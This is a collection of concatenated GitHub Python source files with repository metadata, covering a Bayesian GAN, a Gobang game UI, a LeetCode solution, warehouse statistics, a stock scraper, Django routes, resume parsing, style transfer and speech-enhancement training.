self.D_weight_dims.items():\r\n print(\"{} : \".format(k), end=\" \");\r\n print(v);\r\n print(\" 2. kernel size \");\r\n print(self.D_kernel_sizes);\r\n\r\n print(\" 3. num_dfs\")\r\n print(self.num_d_features);\r\n print(\"===============================================================\")\r\n\r\n\r\n\r\n\r\n\r\ndef get_session_MNIST():\r\n if tf.get_default_session() is None:\r\n print(\"Create new session\");\r\n tf.reset_default_graph();\r\n _SESSION = tf.InteractiveSession();\r\n else:\r\n print(\"Use old session\");\r\n _SESSION = tf.get_default_session();\r\n\r\n return _SESSION;\r\n\r\n\r\n\r\ndef BGAN_example_MNIST():\r\n \"\"\" Set the path to save the result\"\"\"\r\n data = \"/MNIST/\";\r\n path = \"./GAN/BDCGAN/\" + data;\r\n model_path = path + \"model/\";\r\n fig_path = path + \"image/\";\r\n\r\n if not os.path.exists(model_path):\r\n os.makedirs(model_path);\r\n\r\n if not os.path.exists(fig_path):\r\n os.makedirs(fig_path);\r\n\r\n z_dim = 100;\r\n g_filters = 64;\r\n d_filters = 96;\r\n batch_size = 64;\r\n num_layer = 4;\r\n J = 10; # number of samples of z/generators\r\n J_d = 1; # number of discriminator weight samples\r\n num_mcmc = 2;\r\n\r\n\r\n\r\n train_iter = 75000;\r\n base_lr = 0.005;\r\n lr_decay = 3.0;\r\n optimizer = 'sgd'\r\n\r\n n_save = 100;\r\n\r\n dataset = MNIST();\r\n x_dim = dataset.x_dim;\r\n datasize = dataset.dataset_size;\r\n\r\n random_seed = 2222;\r\n\r\n session = get_session_MNIST();\r\n tf.set_random_seed(random_seed);\r\n\r\n dcgan = BDCGAN(x_dim=x_dim, z_dim=z_dim,\r\n batch_size=batch_size,dataset_size=datasize,\r\n g_filter=g_filters, d_filter=d_filters,\r\n J=J, J_d=J_d, M=num_mcmc, num_layer=num_layer,\r\n lr=base_lr, optimizer=optimizer);\r\n\r\n print(\"BDCGAN : \");\r\n dcgan.print_Weight_info();\r\n\r\n print(\"Start session\");\r\n session.run(tf.global_variables_initializer());\r\n\r\n optimizer_dict = {\"D\":dcgan.d_train_ops_adam,\r\n \"G\":dcgan.g_train_ops_adam};\r\n\r\n num_D = J_d;\r\n saver = tf.train.Saver();\r\n\r\n for itr in range(train_iter):\r\n\r\n if itr == 5000:\r\n print(\"Switching to user-specified optimizer\");\r\n optimizer_dict = {\"D\":dcgan.d_train_ops,\r\n \"G\":dcgan.g_train_ops};\r\n\r\n learning_rate = base_lr*np.exp(-lr_decay*min(1.0, (itr*batch_size)/float(datasize)));\r\n\r\n image_batch, _ = dataset.next_batch(batch_size, class_id=None);\r\n\r\n # Compute d_loss\r\n batch_z = np.random.uniform(-1, 1, [batch_size, z_dim, dcgan.num_G]);\r\n d_info = session.run(optimizer_dict[\"D\"] + dcgan.d_losses,\r\n feed_dict={dcgan.inputs: image_batch,\r\n dcgan.z: batch_z,\r\n dcgan.D_learning_rate: learning_rate});\r\n\r\n d_losses = d_info[num_D:num_D*2];\r\n\r\n # Compute g_loss\r\n batch_z = np.random.uniform(-1, 1, [batch_size, z_dim, dcgan.num_G]);\r\n g_info = session.run(optimizer_dict[\"G\"] + dcgan.g_losses,\r\n feed_dict={dcgan.z: batch_z,\r\n dcgan.inputs: image_batch,\r\n dcgan.G_learning_rate: learning_rate});\r\n g_losses = [g_ for g_ in g_info if g_ is not None];\r\n\r\n\r\n if itr > 0 and itr % n_save == 0:\r\n print(\"Iteration: {}\".format(itr));\r\n print(\"D loss : \");\r\n print(d_losses);\r\n print(\"G loss : \");\r\n print(g_losses);\r\n\r\n # results = {\"d_losses\": map(float, d_losses),\r\n # \"g_losses\": map(float, g_losses),\r\n # \"timestamp\": time.time()};\r\n\r\n saver.save(session, model_path+\"model_\" + str(itr) + \".ckpt\");\r\n\r\n for zi in range(dcgan.num_G):\r\n _imgs, _ps = [], [];\r\n\r\n for _ in range(10):\r\n z_sampler = np.random.uniform(-1, 1, size=(batch_size, z_dim));\r\n sampled_imgs = session.run(dcgan.G_sampler[zi*dcgan.num_mcmc],\r\n feed_dict={dcgan.z_sampler: z_sampler});\r\n _imgs.append(sampled_imgs);\r\n\r\n sampled_imgs = np.concatenate(_imgs);\r\n print_images(sampled_imgs,\r\n \"BDCGAN_%i_%.2f\" % (zi, g_losses[zi * dcgan.num_mcmc]),\r\n itr, fig_path);\r\n\r\n print_images(image_batch, \"RAW\", itr, fig_path);\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"My DCGAN\");\r\n X = BDCGAN([28, 28, 1], 128, 60000, 64, g_filter=64, d_filter=96);\r\n # #X = BDCGAN([28, 28, 1], 128, 60000, 64, g_filter=64, d_filter=64);\r\n X.print_Weight_info();\r\n #BGAN_example_MNIST()\r\n","repo_name":"yoonjeong-choi-dev/study-history","sub_path":"AI/BayesianGAN/myBDCGAN.py","file_name":"myBDCGAN.py","file_ext":"py","file_size_in_byte":45221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"42278597278","text":"'''\nFunction:\n 定义联机对战\nAuthor:\n Charles\n微信公众号:\n Charles的皮卡丘\n'''\nimport sys\nimport random\nfrom .server import *\nfrom .client import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\n\n'''联机对战'''\nclass PlayOnlineUI(QWidget):\n def __init__(self, cfg, home_ui, parent=None, **kwargs):\n super(PlayOnlineUI, self).__init__(parent)\n self.cfg = cfg\n self.home_ui = home_ui\n self.setWindowTitle('联机对战')\n self.setWindowIcon(QIcon(cfg.ICON_FILEPATH))\n self.setFixedSize(300, 200)\n # 昵称\n self.nickname = random.choice(['杰尼龟', '皮卡丘', '小火龙', '小锯鳄', '妙蛙种子', '菊草叶'])\n self.layout0 = QHBoxLayout()\n self.nickname_label = QLabel('游戏昵称:', self)\n self.nickname_edit = QLineEdit(self)\n self.nickname_edit.setText(self.nickname)\n self.layout0.addWidget(self.nickname_label, 1)\n self.layout0.addWidget(self.nickname_edit, 3)\n # IP\n self.target_ip = '127.0.0.1'\n self.layout1 = QHBoxLayout()\n self.ip_label = QLabel('对方IP:', self)\n self.ip_edit = QLineEdit(self)\n self.ip_edit.setText(self.target_ip)\n self.layout1.addWidget(self.ip_label, 1)\n self.layout1.addWidget(self.ip_edit, 3)\n # 按钮\n self.layout2 = QHBoxLayout()\n self.connect_button = QPushButton('作为客户端', self)\n self.connect_button.clicked.connect(self.becomeClient)\n self.ashost_button = QPushButton('作为服务器', self)\n self.ashost_button.clicked.connect(self.becomeHost)\n self.layout2.addWidget(self.connect_button)\n self.layout2.addWidget(self.ashost_button)\n # 布局\n self.layout = QVBoxLayout()\n self.layout.addLayout(self.layout0)\n self.layout.addLayout(self.layout1)\n self.layout.addLayout(self.layout2)\n self.setLayout(self.layout)\n '''作为客户端'''\n def becomeClient(self):\n self.close()\n self.nickname = self.nickname_edit.text()\n self.target_ip = self.ip_edit.text()\n self.client_ui = GobangClient(cfg=self.cfg, nickname=self.nickname, server_ip=self.target_ip)\n self.client_ui.exit_signal.connect(lambda: sys.exit())\n self.client_ui.back_signal.connect(self.home_ui.show)\n self.client_ui.show()\n '''作为服务器'''\n def becomeHost(self):\n self.close()\n self.nickname = self.nickname_edit.text()\n self.server_ui = GobangSever(cfg=self.cfg, nickname=self.nickname)\n self.server_ui.exit_signal.connect(lambda: sys.exit())\n self.server_ui.back_signal.connect(self.home_ui.show)\n self.server_ui.show()","repo_name":"CharlesPikachu/Games","sub_path":"cpgames/core/games/gobang/modules/online/playonline.py","file_name":"playonline.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":4711,"dataset":"github-code","pt":"68"} +{"seq_id":"5803009663","text":"'''\nWrite an efficient algorithm that searches for a value target in an m x n integer matrix matrix. This matrix has the following properties:\n\n Integers in each row are sorted from left to right.\n The first integer of each row is greater than the last integer of the previous row.\n\nConstraints:\n m == matrix.length\n n == matrix[i].length\n 1 <= m, n <= 100\n -10^4 <= matrix[i][j], target <= 10^4\n'''\n\nclass Solution:\n def searchMatrix(self, matrix: list[list[int]], target: int) -> bool:\n for row in matrix:\n if target >= row[0] and target <= row[-1]:\n return target in row\n\n# Tests\nsoln = Solution()\nprint(soln.searchMatrix([[1,3,5,7],[10,11,16,20],[23,30,34,60]], 3)) # True\nprint(soln.searchMatrix([[1,3,5,7],[10,11,16,20],[23,30,34,60]], 13)) # False\n\n# Runtime: 67ms\n# Memory: 14.3 MB","repo_name":"salsinan/algorithms","sub_path":"Python/search_matrix.py","file_name":"search_matrix.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18152153985","text":"from typing import TypeVar\n\nimport pandas as pd\nimport numpy as np\nimport arrow\nfrom pydantic import BaseModel, Field\n\nfrom data.ozon_methods import get_warehouses_data, get_orders_data\n\n\nPandasDataFrame = TypeVar('pandas.core.frame.DataFrame')\n\n\nclass StatWarehouse(BaseModel):\n data_ekb: PandasDataFrame = Field(title=\"prepare_ekb\")\n data_msk: PandasDataFrame = Field(title=\"prepare_msk\")\n\n\nekb_wh_name = \"ЕКАТЕРИНБУРГ\"\nmsk_wh_name = \"ХОРУГВИНО\"\ndict_optimal_wh_value = {ekb_wh_name: 3, msk_wh_name: 5}\nkoeff_dict = {1: 1.3, 2: 1.3, 3: 1.3, 4: 1.2, 5: 1.1, 6: 1.1, 7: 1.1, 8: 1.1, 9: 1.2, 10: 1.3, 11: 1.4, 12: 1.4}\n\n\ndef filter_orders(df, warehouse, count_months=1, status_filter=('cancelled',)):\n data_filter = int(arrow.utcnow().shift(months=-count_months).timestamp())\n return df[\n (df.order_datetime > data_filter) & ~df.status.isin(status_filter) & df.warehouse.str.contains(warehouse)\n ].reset_index(drop=True)\n\n\ndef filter_wh(df, warehouse):\n return df[df.warehouse_name.str.contains(warehouse)].reset_index(drop=True)\n\n\ndef get_stat_by_wh(orders_df, wh_df, warehouse_name):\n orders_wh = filter_orders(orders_df, warehouse_name).groupby(\n ['name', 'artikul']\n )[['quantity']].agg('sum').reset_index()\n\n orders_wh.columns = ['name', 'artikul', 'saled']\n wh_by_name = filter_wh(wh_df, warehouse_name)\n wh_by_name.columns = ['warehouse_name', 'name', 'artikul', 'in_ozon']\n df = pd.merge(orders_wh, wh_by_name, on=\"artikul\", how=\"outer\").sort_values(\"artikul\")\n df.name_y.fillna(df.name_x, inplace=True)\n df['optimal'] = float(dict_optimal_wh_value[warehouse_name])\n df = df[['warehouse_name', 'artikul', 'name_y', 'optimal', 'in_ozon', 'saled']].fillna(0).reset_index(drop=True)\n df.columns = ['warehouse_name', 'artikul', 'name', 'optimal', 'in_ozon', 'saled']\n df.warehouse_name = warehouse_name\n return df.fillna(0)\n\n\ndef prepare_to_buy(df, number_month: int = 5):\n koeff = koeff_dict[number_month]\n df['to_buy'] = 0.0\n df['after_delivery'] = 0.0\n\n df.to_buy = ((df.saled * koeff).apply(np.ceil) - df.in_ozon).clip(lower=0.0)\n df.after_delivery = df.in_ozon + df.to_buy\n\n df[df.after_delivery < df.optimal].to_buy = (df.optimal - df.after_delivery + df.to_buy).clip(lower=0.0)\n df[df.after_delivery < df.saled].to_buy = (df.saled * koeff - df.in_ozon).clip(lower=0.0)\n df.drop(columns=[\"after_delivery\"], inplace=True)\n return df\n\n\ndef get_prepared_data(df_orders, df_wh, wh_name):\n stat = get_stat_by_wh(df_orders, df_wh, wh_name)\n return prepare_to_buy(stat, arrow.now().month)\n\n\ndef get_data_by_warehouse() -> StatWarehouse:\n wh_data = get_warehouses_data()\n orders = get_orders_data()\n\n df_wh = pd.DataFrame([s.__dict__ for s in wh_data])\n df_wh.warehouse_name = df_wh.warehouse_name.str.upper()\n\n df_orders = pd.DataFrame([s.__dict__ for s in orders])\n df_orders['order_datetime'] = df_orders['order_datetime'].astype('datetime64[ns]')\n df_orders['order_datetime'] = (df_orders['order_datetime'] - pd.Timestamp(0)) // pd.Timedelta('1s')\n\n data_ekb = get_prepared_data(df_orders, df_wh, ekb_wh_name)\n data_msk = get_prepared_data(df_orders, df_wh, msk_wh_name)\n\n return StatWarehouse(data_ekb=data_ekb, data_msk=data_msk)\n\n\nif __name__ == '__main__':\n import warnings\n with warnings.catch_warnings(record=True):\n data = get_data_by_warehouse()\n data.data_ekb.to_excel('prepare_ekb.xlsx', index=False)\n data.data_msk.to_excel('prepare_msk.xlsx', index=False)\n","repo_name":"Evgen4567/tg_eware","sub_path":"app/data/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25486726816","text":"import pandas as pd\nimport collections\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nex=pd.read_excel('2019年12月学业水平考试2018级考生成绩.xls')\nprint(ex.iloc[0,5:10])\n\nmatplotlib.rcParams['font.sans-serif']=['SimHei'] \nmatplotlib.rcParams['axes.unicode_minus']=False\n#plt.ylim(0,900)\n\ndef al(rects):\n\tn=0\n\tfor i in rects:\n\t\tplt.text(i.get_x()+i.get_width()/2,i.get_height()*1.03,i.get_height(),ha='center',va='bottom',fontsize='large')\n\n\ntag=list(ex.iloc[0,5:10])\nprint(tag)\ncolor='rgby'\n\n#c=collections.Counter([ex.iloc[i,4][6:14] for i in range(1,1332)])\nc=collections.Counter([ex.iloc[i,4][10:14] for i in range(1,1332)]).most_common(50)\nname_list=['%d月%d日' % (int(i[0])//100,int(i[0])%100) for i in c]\nc=[i[1] for i in c]\nprint(c)\nprint(len(c))\nprint(name_list)\nplt.ylim(0,20)\nplt.title('浦中高二生日月份分布',fontsize='x-large')\n#name_list=['%d月'%i for i in range(1,13)]\nx=np.linspace(0,len(c),len(c))\nal(plt.bar(x,c,color=['red','green','blue','yellow','pink','lime','royalblue']))\nplt.xticks(x,name_list,rotation=45)\nplt.yticks(np.linspace(0,20,21))\n\n\nplt.show()\n","repo_name":"ladeng07/-Python-","sub_path":"浦中数据分析/精确生日分析.py","file_name":"精确生日分析.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"27473456031","text":"'''\nAuthor: Jordan Ott\nDate: February 20th, 2017\nDescription: This module scrapes the top gainers and losers from the New York stock market over the past\n150 business days and outputs the data to csv files.\nRequirements: \n\tpandas\n\tselenium\n\tfirefox\n'''\nimport time\nimport pandas as pd\n# BDay is business day, not birthday...\nfrom pandas.tseries.offsets import BDay\nfrom selenium import webdriver\n\n# URLs for gainers and decliners using the wall street journal\ngainers = [\"http://online.wsj.com/mdc/public/page/2_3021-gainnyse-gainer-\",\".html?mod=mdc_pastcalendar\"]\ndecliners = [\"http://online.wsj.com/mdc/public/page/2_3021-losenyse-loser-\",\".html?mod=mdc_pastcalendar\"]\n\ndef build_past_url(days_since_current,stock_movement):\n\ttoday = pd.datetime.today()\n\tpast_date = today - BDay(days_since_current)\n\tdate = past_date.strftime('%Y%m%d')\n\turl = stock_movement[0] + date + stock_movement[1]\n\treturn url,date\n\ndef scrape_table(data_file,url,date):\n\tdriver.get(url)\n\ttbody = driver.find_elements_by_css_selector('tbody')\n\ttable_body = tbody[5]\n\tif len(tbody) == 10:\n\t\ttable_body = tbody[6]\n\ttable_rows = table_body.find_elements_by_css_selector(\"tr\")\n\tfor index in range(1,len(table_rows)):\n\t\tindividual_row = table_rows[index].find_elements_by_css_selector(\"td\")\n\t\tcompany_name = individual_row[1].find_elements_by_css_selector('a')[0].text\n\t\tcompany_name = company_name[company_name.find(\"(\")+1:company_name.find(\")\")]\n\t\tprice = individual_row[2].text\n\t\tdollar_change = individual_row[3].text\n\t\tpercent_change = individual_row[4].text\n\t\tline = date +','+ company_name +','+ price +','+ dollar_change +','+ percent_change +'\\n'\n\t\t\n\t\tdata_file.write(line)\n\t\n# 150 for last 150 business days\n'''\nfor num in range(1,150):\n\tgainers_url,date = build_past_url(num,gainers)\n\tdecliners_url,date = build_past_url(num,decliners)\n\tscrape_table(gainers_file,gainers_url,date)\n\tscrape_table(decliners_file,decliners_url,date)\n\tprint(num)\n'''\ndef get_daily():\n\tdriver = webdriver.Firefox()\n\n\tgainers_file = open(\"gainers.csv\",'w')\n\tdecliners_file = open(\"decliners.csv\",'w')\n\t\n\tgainers_url = \"http://online.wsj.com/mdc/public/page/2_3021-gainnyse-gainer.html\"\n\tdecliners_url = \"http://online.wsj.com/mdc/public/page/2_3021-losenyse-loser.html\"\n\tdate = pd.datetime.today().strftime('%Y%m%d')\n\n\tscrape_table(gainers_file,gainers_url,date)\n\tscrape_table(decliners_file,decliners_url,date)\n\n\tgainers_file.close()\n\tdecliners_file.close()\n\tdriver.quit()\n","repo_name":"jordanott/Stock-Trading-Bot","sub_path":"stock_scrapper.py","file_name":"stock_scrapper.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"73561166937","text":"\"\"\"MedicalEgzersiz URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib.auth import views as auth_views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\n\nfrom MedicalEgzersiz import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',views.homepage,name='home-page'),\n path('home/dashboard', views.home, name='home-dashboard'),\n\n path('login/', auth_views.LoginView.as_view(template_name='pages/login.html'), name='login'),\n path('logout/', auth_views.LogoutView.as_view(template_name='pages/logout.html'), name='logout'),\n path('personal_register/', auth_views.LoginView.as_view(template_name='pages/personal_register.html'),\n name='personal_register'),\n path('registration/', include('registration.urls')),\n path('fitness/', include('fitness.urls')),\n path('postural/', include('postural.urls')),\n path('medical/', include('medical.urls')),\n path('athletic/', include('athletic.urls')),\n path('exercise_prescription/', include('exercise_prescription.urls')),\n path('corrective_exercise/', include('corrective_exercise.urls')),\n path('medical_exercise/', include('medical_exercise.urls')),\n path('athletic_development/', include('athletic_development.urls')),\n path('exercise_tracking/', include('exercise_tracking.urls')),\n path('finance_module/', include('finance_module.urls')),\n path('reporting_analysis/', include('reporting_analysis.urls')),\n path('forms_contents/', include('forms_contents.urls')),\n path('settings/', include('settings.urls')),\n path('pilates/', include('pilates.urls')),\n path('metabolic/', include('metabolic.urls')),\n\n ] \\\n + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) \\\n + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","repo_name":"cetinercelik/FitnessMonitor","sub_path":"MedicalEgzersiz/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32927646113","text":"from . import utils\nimport pdfx\nfrom pyresparser import ResumeParser\nimport random\n\n\n\nclass ResumeExtract(object):\n def __init__(self, fileName):\n self.__details = {\n 'personal_details': {\n 'name': None,\n 'email': None,\n 'mobile_number': None,\n },\n 'skills': None,\n 'education': None,\n 'experience': None,\n 'no_of_pages': None,\n 'links': None,\n 'total_experience': None,\n 'projects': None,\n 'achievements': None,\n 'hobbies': None,\n 'score':None\n }\n self.__fileName = fileName\n\n def __get_details(self, fileName):\n # Modify and regroup extracted data\n pdf = pdfx.PDFx(fileName)\n links = pdf.get_references_as_dict()\n data = ResumeParser(fileName).get_extracted_data()\n\n self.__details[\"personal_details\"]['name'] = data[\"name\"]\n self.__details[\"personal_details\"]['email'] = data[\"email\"]\n self.__details[\"personal_details\"]['mobile_number'] = data[\"mobile_number\"]\n self.__details[\"skills\"] = data[\"skills\"]\n self.__details[\"education\"] = data[\"degree\"]\n self.__details[\"projects\"] = utils.getProjects()\n self.__details[\"achievements\"] = utils.getAchievements()\n self.__details[\"hobbies\"] = utils.getHobbies()\n self.__details[\"experience\"] = data[\"experience\"]\n self.__details[\"no_of_pages\"] = data[\"no_of_pages\"]\n self.__details[\"links\"] = utils.getLinks(links)\n self.__details[\"total_experience\"] = data[\"total_experience\"]\n # For testing, replace with real algo later\n self.__details[\"score\"] = random.randint(60,100)\n\n return self.__details\n\n def get_data(self):\n # Return grouped and modified data\n return self.__get_details(self.__fileName)\n","repo_name":"Yashdew/Assessor","sub_path":"api/resume/extraction/resumeextraction.py","file_name":"resumeextraction.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"68"} +{"seq_id":"3975609272","text":"import tensorflow as tf\nfrom .utils import tensor_to_image\nfrom .models import TransformModel\nimport PIL\nimport numpy as np\nimport IPython.display as display\nimport time\nfrom datetime import datetime\nimport os\n\n\ndef tensor_to_image(tensor):\n tensor = np.array(tensor, dtype=np.uint8)\n if np.ndim(tensor) > 3:\n assert tensor.shape[0] == 1\n tensor = tensor[0]\n return PIL.Image.fromarray(tensor)\n\n\ndef FastStyleTransfer(image_type, image_path):\n opt = tf.keras.optimizers.Adam(learning_rate=1e-3)\n train = TransformModel()\n model_save_path = os.getcwd() + '/FastStyleTransfer/' + image_type\n ckpt = tf.train.Checkpoint(step=tf.Variable(0), optimizer=opt, net=train)\n manager = tf.train.CheckpointManager(\n ckpt, model_save_path, max_to_keep=3)\n ckpt.restore(manager.latest_checkpoint)\n net = ckpt.net\n image = PIL.Image.open(image_path)\n image = np.array(image, dtype=np.float32)\n\n if len(image.shape) == 2:\n image = np.stack((image, image, image))\n # Channel=4 인 경우\n elif image.shape[-1] == 4:\n image = PIL.Image.open(image_path).convert('RGB')\n image = np.array(image, dtype=np.float32)\n # Channel=2 인 경우\n elif image.shape[-1] == 2:\n image = 255.-image[:,:,1]\n image = np.dstack((image, image, image))\n # batch_size 추가 (tensorflow는 4차원 tensor가 입력으로 주어짐)\n\n image = np.expand_dims(image, axis=0)\n # with tf.device('/device:XLA_CPU:0'):\n # train = TransformModel()\n # styles = net(image)\n\n train = TransformModel()\n styles = net(image)\n\n image = tensor_to_image(styles)\n time = str(datetime.now().hour) + str(datetime.now().minute) + \\\n str(datetime.now().second)\n result_name = f'result_{time}.jpg'\n UPLOAD_URL = os.getcwd() + '/static/faststyletransfer/result/' + result_name\n image.save(UPLOAD_URL)\n return result_name\n","repo_name":"ContecPluto/SSAFY-ART","sub_path":"flask_server/FastStyleTransfer/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21027037686","text":"import os, argparse, torch, random, sys\nfrom Trainer import train, test\nfrom Load_model import Load_SE_model, Load_data, Load_data_VC\nfrom utils.util import check_folder\nfrom utils.load_asr_data import load_y_dict\nfrom tensorboardX import SummaryWriter\nfrom CombinedModel import CombinedModel, CombinedModel_VC\nfrom espnet.nets.pytorch_backend.transformer.optimizer import get_std_opt\nfrom espnet.asr.asr_utils import get_model_conf\nimport torch.backends.cudnn as cudnn\nimport pandas as pd\n# import pdb\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"4\"\n# fix random\nSEED = 999\nrandom.seed(SEED)\ntorch.manual_seed(SEED)\ncudnn.deterministic = True\n\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--mode', type=str, default='train')\n #####\n parser.add_argument('--train_noisy', type=str, default='')\n parser.add_argument('--train_clean', type=str, default='')\n parser.add_argument('--test_noisy', type=str, default='')\n parser.add_argument('--test_clean', type=str, default='')\n parser.add_argument('--out_path', type=str, default='')\n #####\n parser.add_argument('--epochs', type=int, default=150)\n parser.add_argument('--batch_size', type=int, default=4) \n parser.add_argument('--lr', type=float, default=0.00005)\n parser.add_argument('--loss_fn', type=str, default='l1')\n parser.add_argument('--optim', type=str, default='adam')\n parser.add_argument('--SEmodel', type=str, default='transformerencoder_03') \n #####\n parser.add_argument('--val_ratio', type=float, default = 0.1)\n parser.add_argument('--train_num', type=int, default = None)\n parser.add_argument('--test_num', type=int, default = None)\n #####\n parser.add_argument('--Espnet_path', type=str, default=None)\n parser.add_argument('--ASRmodel_path', type=str, default='data/ASRmodel.acc.best.entire')\n parser.add_argument('--VCmodel_path', type=str, default='data/TTSmodel.pretrained.entire')\n parser.add_argument('--VC_test_json', type=str, default=None)\n #####\n parser.add_argument('--alpha', type=float, default=0.001) #loss = (1 - self.alpha) * SEloss + self.alpha * ASRloss\n parser.add_argument('--alpha_epoch', type=int, default=70) # alpha = 0 when epoch < alpha_epoch\n parser.add_argument('--asr_y_path', type=str, default='data/data_test.json,data/data_train_dev.json,data/data_train_nodev.json') \n parser.add_argument('--gpu', type=str, default='0')\n parser.add_argument('--target', type=str, default='MAP') #'MAP' or 'IRM'\n parser.add_argument('--task', type=str, default='DNS_SE') \n parser.add_argument('--resume' , action='store_true')\n parser.add_argument('--retrain', action='store_true')\n parser.add_argument('--corpus', type=str, default=\"TIMIT\") # corpus: TIMIT, TMHINT, TMHINT_DYS\n parser.add_argument('--asr_result', type=str, default=None)\n parser.add_argument('--tag', type=str, default=\"\")\n parser.add_argument('--after_alpha_epoch', action='store_true') # on when test or retrain using after_alpha_epoch model\n parser.add_argument('--re_epochs', type=int, default=150)\n parser.add_argument('--checkpoint', type=str, default=None)\n args = parser.parse_args()\n args = get_path(args)\n return args\n\ndef get_path(args):\n tag_str = \"\"\n if args.tag:\n tag_str = \"_\" + args.tag\n args.checkpoint_path = f'{args.out_path}/checkpoint/{args.SEmodel}{tag_str}_{args.target}_epochs{args.epochs}' \\\n f'_{args.optim}_{args.loss_fn}_alpha{args.alpha}_alpha_epoch{args.alpha_epoch}_batch{args.batch_size}_'\\\n f'lr{args.lr}.pth.tar'\n args.model_path = f'{args.out_path}/save_model/{args.SEmodel}{tag_str}_{args.target}_epochs{args.epochs}' \\\n f'_{args.optim}_{args.loss_fn}_alpha{args.alpha}_alpha_epoch{args.alpha_epoch}_batch{args.batch_size}_'\\\n f'lr{args.lr}.pth.tar'\n args.score_path = f'{args.out_path}/Result/{args.SEmodel}{tag_str}_{args.target}_epochs{args.epochs}' \\\n f'_{args.optim}_{args.loss_fn}_alpha{args.alpha}_alpha_epoch{args.alpha_epoch}_batch{args.batch_size}_'\\\n f'lr{args.lr}.csv'\n\n if args.after_alpha_epoch:\n args.model_path = args.model_path.replace(\"_alpha_epoch\",\"_after_alpha_epoch\")\n args.checkpoint_path = args.checkpoint_path.replace(\"_alpha_epoch\",\"_after_alpha_epoch\")\n args.score_path = args.score_path.replace(\"_alpha_epoch\",\"_after_alpha_epoch\")\n\n args.enhance_path = f'{args.out_path}/Enhanced/{args.SEmodel}/'\n return args\n\n\nif __name__ == '__main__':\n # get current path\n cwd = os.path.dirname(os.path.abspath(__file__))\n print(cwd)\n print(SEED)\n \n # get and process arguments\n args = get_args()\n \n # tensorboard\n writer = SummaryWriter(f'{args.out_path}/logs')\n\n \n \n if args.corpus==\"TMHINT_DYS\":\n if args.mode == 'test':\n print(\"Error: Run test using the VC script!\")\n exit()\n exit()\n exit()\n \n # TMHINT Train\n epoch=0\n args.checkpoint_path=args.checkpoint_path.replace(\"transformerencoder_03\",\"VCmodel\")\n args.model_path=args.model_path.replace(\"transformerencoder_03\",\"VCmodel\")\n args.score_path=args.score_path.replace(\"transformerencoder_03\",\"VCmodel\")\n \n if args.retrain or args.resume:\n idim, odim, train_args = get_model_conf(args.model_path, None)\n semodel, epoch, best_loss, optimizer, criterion, device = Load_SE_model(args, idim, odim, train_args)\n model = CombinedModel_VC(args,semodel)\n else:\n best_loss=1000\n device = torch.device(f'cuda:{args.gpu}')\n model = CombinedModel_VC(args)\n \n loader = Load_data_VC(args, model.SEmodel.args)\n \n else:\n # load and construct the model\n semodel, epoch, best_loss, optimizer, secriterion, device = Load_SE_model(args)\n model = CombinedModel(args, semodel, secriterion)\n if args.mode == 'train':\n loader = Load_data(args)\n else:\n asr_dict = load_y_dict(args)\n\n\n\n # control parameter\n if args.mode == 'train':\n for param in model.SEmodel.parameters():\n param.requires_grad = True\n else:\n for param in model.SEmodel.parameters():\n param.requires_grad = False\n\n for param in model.ASRmodel.parameters():\n param.requires_grad = False\n \n # if args.retrain:\n # args.epochs = args.re_epochs \n \n \n try:\n if args.mode == 'train':\n if args.corpus==\"TMHINT_DYS\":\n # --adim, default=384, type=int, \"Number of attention transformation dimensions\"\n optimizer = get_std_opt(model.SEmodel.parameters(), 384, model.SEmodel.args.transformer_warmup_steps, model.SEmodel.args.transformer_lr)\n train(model, args.epochs, epoch, best_loss, optimizer, \n device, loader, writer, args.model_path, args)\n \n # mode==\"test\"\n else: \n test(model, device, args.test_noisy, args.test_clean, asr_dict, args.enhance_path, args.score_path, args)\n \n except KeyboardInterrupt:\n state_dict = {\n 'epoch': epoch,\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_loss': best_loss\n }\n check_folder(args.checkpoint_path)\n torch.save(state_dict, args.checkpoint_path)\n print('Saved interrupt')\n try:\n sys.exit(0)\n except SystemExit:\n 